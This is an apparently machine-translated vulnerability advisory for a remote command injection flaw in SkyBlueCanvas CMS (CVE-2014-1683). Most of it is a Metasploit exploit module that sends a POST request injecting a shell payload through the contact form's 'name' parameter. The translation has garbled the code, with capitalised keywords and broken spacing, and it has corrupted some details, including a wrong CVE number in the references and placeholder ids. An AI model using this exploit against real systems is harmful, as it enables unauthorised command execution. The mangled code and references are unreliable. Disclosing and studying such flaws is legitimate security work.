SkyBlueCanvas 'index. php' Multiple Remote Command Injection Vulnerability

Release date:
Updated on:

Affected Systems:
SkyBlueCanvas 1.1-r248-03
Description:
--------------------------------------------------------------------------------
Bugtraq id: 65129
CVE (CAN) ID: CVE-2014-1683

SkyBlueCanvas is a Web content management system.

SkyBlueCanvas 1.1 r248-04 earlier, cms/data/skins/techjunkie/fragments/contacts/functions. when the pid parameter of the php function bashMail is 4, remote attackers can use the index. the shell metacharacters in the name, email, subject, and message parameters in php can be exploited to execute arbitrary commands.

<* Source: Scott Parish (srp@srparish.net)

Link: http://secunia.com/advisories/56646/
Http://xforce.iss.net/xforce/xfdb/90670
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

##
# This module requires Metasploit: http // metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

Require 'msf/core'

Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking

Include Msf: Exploit: Remote: HttpClient

Def initialize (info = {})
Super (update_info (info,
'Name' => 'skybluecanvas CMS Remote Code Execution ',
'Description' => % q {
This module exploits an arbitrary command execution vulnerability
In SkyBlueCanvas CMS version 1.1 r248-03 and below.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Scott Parish', # Vulnerability discovery and exploit
'Xistence <xistence [at] 0x90. nl> '# Metasploit Module
],
'References '=>
[
['Cve', '2017-2014 '],
['Ossvdb', '123'],
['Bid', '123'],
['Edb', '123'],
['Url', 'HTTP: // packetstormsecurity.com/files/124948/skybluecanvas-cms-1.1-r248-03-command-injection.html']
],
'Privileged' => false,
'Payload' =>
{
# Arbitrary big number. The payload gets sent as an HTTP
# Response body, so really it's unlimited
'Space' => 262144, #256 k
'Disablenops' => true,
'Compat' =>
{
'Connectiontype' => 'Find ',
'Payloadtype' => 'cmd ',
'Requiredcmd' => 'generic perl ruby bash telnet python'
}
},
'Platform' => % w {unix },
'Targets' =>
[
['Skybluecanvas 1.1 r248', {}]
],
'Arch '=> ARCH_CMD,
'Disclosuredate' => 'Jan 28 2014 ',
'Defaulttarget' => 0 ))

Register_options (
[
OptString. new ('targeturi ', [true, "The path to the SkyBlueCanvas CMS installation", "/"]),
], Self. class)
End

Def check
Uri = normalize_uri (target_uri.path.to_s, "index. php ")

Res = send_request_raw ('uri '=> uri)

If res and res. body = ~ /[1.1 r248]/
Vprint_good ("# {peer}-SkyBlueCanvas CMS 1.1 r248-xx found ")
Return Exploit: CheckCode: Appears
End

Exploit: CheckCode: Safe
End

Def exploit
Uri = normalize_uri (target_uri.path.to_s, "index. php ")

Send_request_cgi ({
'Method' => 'post ',
'Url' => uri,
'Vars _ get' =>{ 'pid '=> '4 '},
'Vars _ Post' =>
{
'Cid' => '3 ',
'Name' => "# {rand_text_alphanumeric (10)} \" ;#{ payload. encoded };",
'Email '=> rand_text_alphanumeric (10 ),
'Subobject' => rand_text_alphanumeric (10 ),
'Message' => rand_text_alphanumeric (10 ),
'Action' => 'send'
}
})
End
End

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

SkyBlueCanvas
-------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://skybluecanvas.com/